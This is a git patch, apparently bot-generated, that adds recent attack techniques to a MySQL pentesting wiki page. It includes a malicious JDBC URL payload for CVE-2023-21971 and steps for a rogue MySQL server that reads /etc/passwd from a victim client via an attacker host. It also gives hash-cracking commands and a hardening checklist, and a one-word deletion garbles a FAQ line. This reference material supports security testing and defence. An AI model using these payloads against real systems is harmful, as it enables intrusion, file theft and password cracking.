From 623eadb34e4b87a407efb165234326e1b08685e5 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sun, 10 Aug 2025 01:48:25 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/network-services-pentesting/pe... --- .../pentesting-mysql.md | 60 ++++++++++++++++++- src/welcome/hacktricks-values-and-faq.md | 3 +- 2 files changed, 60 insertions(+), 3 deletions(-) diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index 0d1c78c18..ec565c39f 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -691,9 +691,67 @@ Entry_4: ​ +## 2023-2025 Highlights (new) + +### JDBC `propertiesTransform` deserialization (CVE-2023-21971) +From Connector/J <= 8.0.32 an attacker who can influence the **JDBC URL** (for instance in third-party software that asks for a connection string) can request arbitrary classes to be loaded on the *client* side via the `propertiesTransform` parameter. If a gadget present on the class-path is loadable this results in **remote code execution in the context of the JDBC client** (pre-auth, because no valid credentials are required). A minimal PoC looks like: + +```java +jdbc:mysql://:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil +``` + +Running `Evil.class` can be as easy as producing it on the class-path of the vulnerable application or letting a rogue MySQL server send a malicious serialized object. The issue was fixed in Connector/J 8.0.33 – upgrade the driver or explicitly set `propertiesTransform` on an allow-list. +(See Snyk write-up for details) + +### Rogue / Fake MySQL server attacks against JDBC clients +Several open-source tools implement a *partial* MySQL protocol in order to attack JDBC clients that connect outwards: + +* **mysql-fake-server** (Java, supports file read and deserialization exploits) +* **rogue_mysql_server** (Python, similar capabilities) + +Typical attack paths: + +1. Victim application loads `mysql-connector-j` with `allowLoadLocalInfile=true` or `autoDeserialize=true`. +2. Attacker controls DNS / host entry so that the hostname of the DB resolves to a machine under their control. +3. Malicious server responds with crafted packets that trigger either `LOCAL INFILE` arbitrary file read or Java deserialization → RCE. + +Example one-liner to start a fake server (Java): + +```bash +java -jar fake-mysql-cli.jar -p 3306 # from 4ra1n/mysql-fake-server +``` + +Then point the victim application to `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` and read `/etc/passwd` by encoding the filename as base64 in the *username* field (`fileread_/etc/passwd` → `base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`). + +### Cracking `caching_sha2_password` hashes +MySQL ≥ 8.0 stores password hashes as **`$mysql-sha2$`** (SHA-256). Both Hashcat (mode **21100**) and John-the-Ripper (`--format=mysql-sha2`) support offline cracking since 2023. Dump the `authentication_string` column and feed it directly: + +```bash +# extract hashes +echo "$mysql-sha2$AABBCC…" > hashes.txt +# Hashcat +hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist +# John the Ripper +john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist +``` + +### Hardening checklist (2025) +• Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** to kill most file-read/write primitives. +• Remove the **`FILE`** privilege from application accounts. +• On Connector/J set `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (empty). +• Disable unused authentication plugins and **require TLS** (`require_secure_transport = ON`). +• Monitor for `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` and sudden `SET GLOBAL` statements. + +--- + ## References +- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/) +- [Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540) +- [mysql-fake-server – Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server) + + + - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/) {{#include ../banners/hacktricks-training.md}} - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} -